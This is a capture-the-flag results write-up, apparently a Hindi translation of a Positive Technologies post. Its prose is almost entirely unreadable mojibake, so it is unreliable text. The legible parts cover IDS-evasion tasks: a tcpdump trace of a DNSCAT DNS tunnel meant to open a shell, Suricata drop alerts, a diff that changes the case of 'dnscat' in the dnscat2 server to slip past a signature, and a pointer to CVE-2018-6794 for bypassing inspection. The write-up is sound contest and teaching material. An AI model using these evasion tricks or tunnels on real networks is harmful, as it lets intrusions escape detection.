рдкреНрд░рддрд┐рдпреЛрдЧрд┐рддрд╛ рдХреЗ рд╡рд┐рдЬреЗрддрд╛ @ psih1337 рджреНрд╡рд╛рд░рд╛ рдПрдХ рд╡реИрдХрд▓реНрдкрд┐рдХ рд╕рдорд╛рдзрд╛рди рдкреНрд░рд╕реНрддрд╛рд╡рд┐рдд рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛ред EnumDomainUsers рдХреНрд╡реЗрд░реА рдиреЗ рдирд╛рдо рд╕реЗ рдирд╣реАрдВ, рдмрд▓реНрдХрд┐ SID (рд╕реБрд░рдХреНрд╖рд╛ рдЖрдИрдбреА) рджреНрд╡рд╛рд░рд╛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреА рдПрдХ рд╕реВрдЪреА рд╡рд╛рдкрд╕ рд▓реМрдЯрд╛ рджреАред SID рдПрдХ рдпрд╛рджреГрдЪреНрдЫрд┐рдХ рд╕рдВрдЦреНрдпрд╛ рдирд╣реАрдВ рд╣реИред рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, LocalSystem рдЦрд╛рддреЗ рдореЗрдВ SID S-1-5-18 рд╣реИ, рдФрд░ рдореИрдиреНрдпреБрдЕрд▓ рд░реВрдк рд╕реЗ рдмрдирд╛рдП рдЧрдП рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреЗ рд▓рд┐рдП, рдпрд╣ 1000 рд╕реЗ рд╢реБрд░реВ рд╣реЛрддрд╛ рд╣реИред
рдЗрд╕ рдкреНрд░рдХрд╛рд░, 1000 рд╕реЗ 2000 рддрдХ рдмреАрдЬ рдХреЛ рдореИрдиреНрдпреБрдЕрд▓ рд░реВрдк рд╕реЗ рд╕реЙрд░реНрдЯ рдХрд░рдирд╛, рд╕рд┐рд╕реНрдЯрдо рдореЗрдВ рд╡рд╛рдВрдЫрд┐рдд рдЦрд╛рддреЛрдВ рдХреЛ рдЦреЛрдЬрдиреЗ рдХреА рдмрд╣реБрдд рд╕рдВрднрд╛рд╡рдирд╛ рд╣реИред рд╡реЗ 1008 рдФрд░ 1009 sids рдХреЗ рддрд╣рдд рдкрд╛рдП рдЧрдПред
рдЗрд╕ рдХрд╛рд░реНрдп рдХреЗ рд╕рдорд╛рдзрд╛рди рдХреЗ рд▓рд┐рдП рд╡рд┐рдВрдбреЛрдЬ рдЗрдиреНрдлреНрд░рд╛рд╕реНрдЯреНрд░рдХреНрдЪрд░ рдкрд░ рд╢реЛрдз рдХрд░рдиреЗ рдореЗрдВ рдбреАрд╕реАрдИрдЖрд░рдкреАрд╕реА рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдФрд░ рдЕрдиреБрднрд╡ рдХреА рд╕рдордЭ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИред @ psih1337 рдХреЗрд╡рд▓ рдПрдХ рд╣реА рдерд╛ рдЬрд┐рд╕рдиреЗ рдЗрд╕реЗ рддрдп рдХрд┐рдпрд╛ред
100.64.0.13 - DNSCAT
рдкреЛрд░реНрдЯ 80 рдкрд░ рдПрдХ рдЖрдИрдкреА рдкрддреЗ рдХреЗ рд▓рд┐рдП рдПрдХ рдлрд╛рд░реНрдо рдХреЗ рд╕рд╛рде рдПрдХ рд╡реЗрдм рдкреЗрдЬ рд╣реИред

рдпрджрд┐ рдЖрдк рдЕрдкрдирд╛ рдЖрдИрдкреА рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдХрд░рддреЗ рд╣реИрдВ, рддреЛ UDP рдкреЛрд░реНрдЯ 53 рдкрд░ рдЖрддрд╛ рд╣реИ:
17:40:45.501553 IP 100.64.0.13.38730 > 100.64.0.187: 61936+ CNAME? dnscat.d2bc039ce800000000d6eae8eae3bf81fd84d1695f5888aba8dcec06d071.a73b3f0561ca4906d268214f4b70da1bdb50f75739ae0577139096732bf8.0d0a987ce23408bac15426a22e. (173) 17:40:45.501639 IP 100.64.0.187 > 100.64.0.13: ICMP 100.64.0.187 udp port domain unreachable, length 209 17:40:46.520457 IP 100.64.0.13.38730 > 100.64.0.187: 21842+ TXT? dnscat.7f4e039ce800000000d6eae8eae3bf81fd84d1695f5888aba8dcec06d071.a73b3f0561ca4906d268214f4b70da1bdb50f75739ae0577139096732bf8.0d0a987ce23408bac15426a22e. (173) 17:40:46.520546 IP 100.64.0.187 > 100.64.0.13: ICMP 100.64.0.187 udp port domain unreachable, length 209
рд╕реНрдкрд╖реНрдЯ рд░реВрдк рд╕реЗ, рдпрд╣ DNSCAT рд╣реИ, рдЬреЛ DNS рд╕реБрд░рдВрдЧреЛрдВ рдХреЗ рд▓рд┐рдП рдПрдХ рдЙрдкрдХрд░рдг рд╣реИред рдкреНрд░рдкрддреНрд░ рдореЗрдВ рдЖрдИрдкреА рдкрддреЗ рдХреЛ рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдХрд░рдиреЗ рдХреЗ рдмрд╛рдж, рдПрдХ DNSCAT рдХреНрд▓рд╛рдЗрдВрдЯ рдЗрд╕рдХреЗ рд▓рд┐рдП рдПрдХ рдХрдиреЗрдХреНрд╢рди рд╕реНрдерд╛рдкрд┐рдд рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░рддрд╛ рд╣реИред рдпрджрд┐ рдпрд╣ рд╕рдлрд▓ рд╣реЛрддрд╛ рд╣реИ, рддреЛ рд╕рд░реНрд╡рд░ (рдпрд╛рдиреА, рдкреНрд░рддрд┐рднрд╛рдЧреА) рдкреНрд░рддрд┐рд╕реНрдкрд░реНрдзреА рдорд╢реАрди рдкрд░ рдПрдХ рд╢реЗрд▓ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдЧрд╛ рдФрд░ рдзреНрд╡рдЬ рдХреЛ рдмрд╛рд╣рд░ рдирд┐рдХрд╛рд▓ рджреЗрдЧрд╛ред
рдмреЗрд╢рдХ, рдЕрдЧрд░ рд╣рдо рд╕рд┐рд░реНрдл DNSCAT рд╕рд░реНрд╡рд░ рдмрдврд╝рд╛рддреЗ рд╣реИрдВ рдФрд░ рдХрдиреЗрдХреНрд╢рди рдХреЛ рд╕реНрд╡реАрдХрд╛рд░ рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░рддреЗ рд╣реИрдВ, рддреЛ рд╣рдо рдЕрд╕рдлрд▓ рд╣реЛрдВрдЧреЗ:
[Drop] [**] [1:4001:1] 'dnscat' string found in DNS response [**]
рд╣рдорд╛рд░реЗ рд╕рд░реНрд╡рд░ рд╕реЗ рдЯреНрд░реИрдлрд╝рд┐рдХ рдореЗрдВ dnscat рд▓рд╛рдЗрди рдкрд░ IDS рд╣рд╕реНрддрд╛рдХреНрд╖рд░ рдЪрд╛рд▓реВ рд╣реИ - рдпрд╣ рд╕рдВрджреЗрд╢ рдореЗрдВ рд╕реНрдкрд╖реНрдЯ рд░реВрдк рд╕реЗ рдХрд╣рд╛ рдЧрдпрд╛ рд╣реИред рдЯреНрд░реИрдлрд╝рд┐рдХ рдХреЛ рдмрд╛рдзрд┐рдд рдпрд╛ рдПрдиреНрдХреНрд░рд┐рдкреНрдЯ рдХрд░рдирд╛ рднреА рдХрд╛рдо рдирд╣реАрдВ рдХрд░реЗрдЧрд╛ред
рдХреНрд▓рд╛рдЗрдВрдЯ рдХреЛрдб рдХреЛ рджреЗрдЦрддреЗ рд╣реБрдП, рд╣рдо рдкрд╛рддреЗ рд╣реИрдВ рдХрд┐ рдЗрд╕рдореЗрдВ рдЪреЗрдХ рдкрд░реНрдпрд╛рдкреНрдд рд╕рдЦреНрдд рдирд╣реАрдВ рд╣реИрдВред рдЕрд░реНрдерд╛рдд, рдЕрдиреБрдХреНрд░рд┐рдпрд╛ рдореЗрдВ dnscat рд▓рд╛рдЗрди рдмрд┐рд▓реНрдХреБрд▓ рдирд╣реАрдВ рджрд┐рдЦрд╛рдИ рджреЗ рд╕рдХрддреА рд╣реИ! рдпрд╣ рдХреЗрд╡рд▓ рдЗрд╕реЗ рдХреЛрдб рд╕реЗ рд╣рдЯрд╛рдиреЗ рдпрд╛ рдиреЗрдЯрд╕реЗрдб рдЙрдкрдпреЛрдЧрд┐рддрд╛ рдХреЗ рд╕рд╛рде рдордХреНрдЦреА рдкрд░ рдкреНрд░рддрд┐рд╕реНрдерд╛рдкрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдмрдиреА рд╣реБрдИ рд╣реИред рддреБрд░рдВрдд рдмрджрд▓рдирд╛ рдмрд╣реБрдд рдЖрд╕рд╛рди рд╣реИ, рд▓реЗрдХрд┐рди рдореИрдВ рдЕрднреА рднреА рд╕рд░реНрд╡рд░ рдХреЛрдб рдХреЗ рд▓рд┐рдП рдПрдХ рдкреИрдЪ рджреВрдВрдЧрд╛:
diff -r dnscat2/server/libs/dnser.rb dnscat2_bypass/server/libs/dnser.rb < segments << unpack("a#{len}") > segments << [unpack("a#{len}")[0].upcase] < name.split(/\./).each do |segment| > name.upcase.split(/\./).each do |segment| diff -r dnscat2/server/tunnel_drivers/driver_dns.rb dnscat2_bypass/server/tunnel_drivers/driver_dns.rb < response = (response == "" ? "dnscat" : ("dnscat." + response)) > response = (response == "" ? "dnsCat" : ("dnsCat." + response))
рдкреНрд░рддрд┐рдпреЛрдЧрд┐рддрд╛ рдореЗрдВ рдЗрд╕ рдЕрд╕рд╛рдЗрдирдореЗрдВрдЯ рдХреЗ рд▓рд┐рдП рдкрд╛рдВрдЪ рд╕рдорд╛рдзрд╛рди рдереЗред
100.64.0.14 - POST
рдЗрд╕ рдкреНрд░рддрд┐рдпреЛрдЧрд┐рддрд╛ рд╡рд╛рд╣рди рд╕реЗ рдзреНрд╡рдЬ рдХрд┐рд╕реА рдХреЛ рдирд╣реАрдВ рдорд┐рд▓рд╛ред

рд╣рдо рдПрдХ рдЖрдИрдкреА рдкрддреЗ рдХреЗ рд╕рд╛рде рдПрдХ рдкрд░рд┐рдЪрд┐рдд рд░реВрдк рджреЗрдЦрддреЗ рд╣реИрдВред рдХреЛрдИ рд╣рдореЗрдВ рдПрдХ рдирдП рдореИрд▓рд╡реЗрдпрд░ рдХреЗ рдкрд░реАрдХреНрд╖рдг рдореЗрдВ рднрд╛рдЧ рд▓реЗрдиреЗ рдХреЗ рд▓рд┐рдП рдкреНрд░рджрд╛рди рдХрд░рддрд╛ рд╣реИред рдЗрд╕рдХреЗ рдирд╡рд╛рдЪрд╛рд░реЛрдВ рдореЗрдВ рдЕрдЬреНрдЮрд╛рдд рддрд░реАрдХреЗ рд╕реЗ рдЖрдИрдбреАрдПрд╕ рдХреЛ рджрд░рдХрд┐рдирд╛рд░ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИред рдЭрдВрдбреЗ рдХреЗ рд▓рд┐рдП, рдЖрдкрдХреЛ рдмрд╕ рдЗрд╕реЗ HTTP рд╣реЗрдбрд░ "рд╕рд░реНрд╡рд░: рдПрдирдЬреА 1 рдПрдирдПрдХреНрд╕" рдХреЗ рдЬрд╡рд╛рдм рдореЗрдВ рднреЗрдЬрдирд╛ рд╣реЛрдЧрд╛ред рдпрд╣ рдЧрд░реНрдо рд╣реЛрдЧрд╛ред
рдЬреИрд╕рд╛ рдХрд┐ рдЕрдкреЗрдХреНрд╖рд┐рдд рдерд╛: рд╣рдореЗрдВ рдЕрдкрдиреЗ рдЖрдИрдкреА рдХреЗ рд▓рд┐рдП рдПрдХ рдЬреАрдИрдЯреА рдЕрдиреБрд░реЛрдз рдорд┐рд▓рддрд╛ рд╣реИ рдФрд░ рдПрдХ рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ рднреЗрдЬрдиреА рд╣реЛрддреА рд╣реИ рдЬреЛ рдЖрдИрдбреАрдПрд╕ рджреНрд╡рд╛рд░рд╛ рдЕрд╡рд░реБрджреНрдз рд╣реЛрддреА рд╣реИред
[Drop] [**] [1:5002:1] 'ng1nx' Server header found. Malware shall not pass [**]
рдПрдХ рд╕рдВрдХреЗрдд рд╣реИ:
рдХрднреА-рдХрднреА, рдХрдард┐рди рджрд┐рдЦрдиреЗ рд╡рд╛рд▓реЗ рдХрд╛рд░реНрдп рд╕рдмрд╕реЗ рд╕рд░рд▓ рд╣реЛрддреЗ рд╣реИрдВред рдпрджрд┐ рдХреБрдЫ рднреА рдХрдордЬреЛрд░ рдирд╣реАрдВ рд▓рдЧрддрд╛ рд╣реИ, рддреЛ рд╢рд╛рдпрдж рдЖрдк рдЕрдкрдиреА рдирд╛рдХ рдХреЗ рдиреАрдЪреЗ рдХреБрдЫ рдпрд╛рдж рдХрд░ рд░рд╣реЗ рд╣реИрдВ?
рд╣рдорд╛рд░реА рдирд╛рдХ рдХреЗ рд╕рд╛рдордиреЗ рдХреБрдЫ рдХрдордЬреЛрд░ рд╣реИ рдЖрдИрдбреАрдПрд╕ред рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ рдкреГрд╖реНрда рд╕реЗ, рдЖрдк рдкрд╛ рд╕рдХрддреЗ рд╣реИрдВ рдХрд┐ рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдПрдХ рд╕реБрд░реАрдХрд╛рдЯрд╛ рдЖрдИрдбреА рд╣реИред

"Suricata IDS рдмрд╛рдпрдкрд╛рд╕" рдХреНрд╡реЗрд░реА рдкрд░ рдкрд╣рд▓рд╛ рд▓рд┐рдВрдХ
CVE-2018-6794 рдХреА рдУрд░ рдЬрд╛рддрд╛ рд╣реИред рдпрджрд┐ рдЯреАрд╕реАрдкреА рд╕рдВрдЪрд╛рд░ (рдЯреАрд╕реАрдкреА рд╣реИрдВрдбрд╢реЗрдХ) рдХреЗ рд╕рд╛рдорд╛рдиреНрдп рдкрд╛рдареНрдпрдХреНрд░рдо рдХрд╛ рдЙрд▓реНрд▓рдВрдШрди рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ рдФрд░ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдкреВрд░реА рд╣реЛрдиреЗ рд╕реЗ рдкрд╣рд▓реЗ рдбреЗрдЯрд╛ рднреЗрдЬрд╛ рдЬрд╛рддрд╛ рд╣реИ рддреЛ рдпрд╣ рднреЗрджреНрдпрддрд╛ рдкреИрдХреЗрдЯ рдирд┐рд░реАрдХреНрд╖рдг рдХреЛ рдмрд╛рдпрдкрд╛рд╕ рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред рдпрд╣ рдЗрд╕ рддрд░рд╣ рджрд┐рдЦрддрд╛ рд╣реИ:
Client -> [SYN] [Seq=0 Ack=0] -> Evil Server
рд╢реЛрд╖рдг рдбрд╛рдЙрдирд▓реЛрдб рдХрд░реЗрдВ, рд▓рд╛рдЗрди рдХреЛ "рдПрдирдЬреА 1 рдПрдирдПрдХреНрд╕" рдореЗрдВ рдмрджрд▓реЗрдВ, рдХрд░реНрдиреЗрд▓ рдЖрд░рдПрд╕рдЯреА рдкреИрдХреЗрдЬ рдмрдВрдж рдХрд░реЗрдВ рдФрд░ рдЪрд▓рд╛рдПрдВред
рдЬреИрд╕рд╛ рдХрд┐ рдкрд╣рд▓реЗ рд╣реА рдЙрд▓реНрд▓реЗрдЦ рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ, рдХрд┐рд╕реА рдиреЗ рдЗрд╕ рдорд╢реАрди рд╕реЗ рдЭрдВрдбреЗ рдкреНрд░рд╛рдкреНрдд рдирд╣реАрдВ рдХрд┐рдП, рд╣рд╛рд▓рд╛рдВрдХрд┐ рдкреНрд░рддрд┐рднрд╛рдЧрд┐рдпреЛрдВ рдХреЗ рдПрдХ рдЬреЛрдбрд╝реЗ рдПрдХ рд╕рдорд╛рдзрд╛рди рдХреЗ рдХрд░реАрдм рдереЗред
рдирд┐рд╖реНрдХрд░реНрд╖
рдкреНрд░рддрд┐рдпреЛрдЧрд┐рддрд╛ рдореЗрдВ рдкрдВрдЬреАрдХреГрдд 49 рдкреНрд░рддрд┐рднрд╛рдЧрд┐рдпреЛрдВ, 12 рдиреЗ рдХрдо рд╕реЗ рдХрдо рдПрдХ рдзреНрд╡рдЬ рдкрд╛рд░рд┐рдд рдХрд┐рдпрд╛ред рдпрд╣ рджрд┐рд▓рдЪрд╕реНрдк рд╣реИ рдХрд┐ рдкреНрд░рддрд┐рд╕реНрдкрд░реНрдзреА рдХрд╛рд░реНрдпреЛрдВ рдореЗрдВ рдПрдХ рд╕рд╛рде рдХрдИ рд╕рдорд╛рдзрд╛рди рд╣реЛ рд╕рдХрддреЗ рд╣реИрдВ, рд╡рд┐рд╢реЗрд╖ рд░реВрдк рд╕реЗ рдПрд╕рдПрдордмреА рдФрд░ рдбреАрд╕реАрдИрдЖрд░рдкреАрд╕реА рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдХреЗ рд╕рд╛рде рдХрд╛рд░реНрдпред рд╣реЛ рд╕рдХрддрд╛ рд╣реИ рдХрд┐ рдХреБрдЫ рдХрд╛рд░реНрдпреЛрдВ рдХреЛ рдкреВрд░рд╛ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЖрдкрдХреЗ рдЕрдкрдиреЗ рд╡рд┐рдЪрд╛рд░ рд╣реЛрдВ?
рдкреБрд░рд╕реНрдХрд╛рд░ рд╡рд┐рдЬреЗрддрд╛ рд╕реНрдерд╛рдиреЛрдВ:
- рдкрд╣рд▓реА рдЬрдЧрд╣: @ psih1337
- рджреВрд╕рд░рд╛ рд╕реНрдерд╛рди: @ webr0ck
- рддреАрд╕рд░рд╛ рд╕реНрдерд╛рди: @empty_jack
рд╣рд╕реНрддрд╛рдХреНрд╖рд░ рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ рдЖрдБрдХрдбрд╝реЗ:

рд╕рднреА рдкреНрд░рддрд┐рднрд╛рдЧрд┐рдпреЛрдВ рдХреЛ рдзрдиреНрдпрд╡рд╛рдж! рдЕрдЧрд▓реЗ рд╕рд╛рд▓ рд╡рд┐рднрд┐рдиреНрди рдХрдард┐рдирд╛рдИ рд╕реНрддрд░реЛрдВ рдХреЗ рдФрд░ рднреА рдЕрдзрд┐рдХ рдХрд╛рд░реНрдп рд╣реЛрдВрдЧреЗред
рдХрд┐рд░рд┐рд▓ рд╢рд┐рдкреБрд▓рд┐рди, рд╕рдХрд╛рд░рд╛рддреНрдордХ рдЯреЗрдХреНрдиреЛрд▓реЙрдЬреАрдЬ
рджреНрд╡рд╛рд░рд╛ рдкреЛрд╕реНрдЯ рдХрд┐рдпрд╛ рдЧрдпрд╛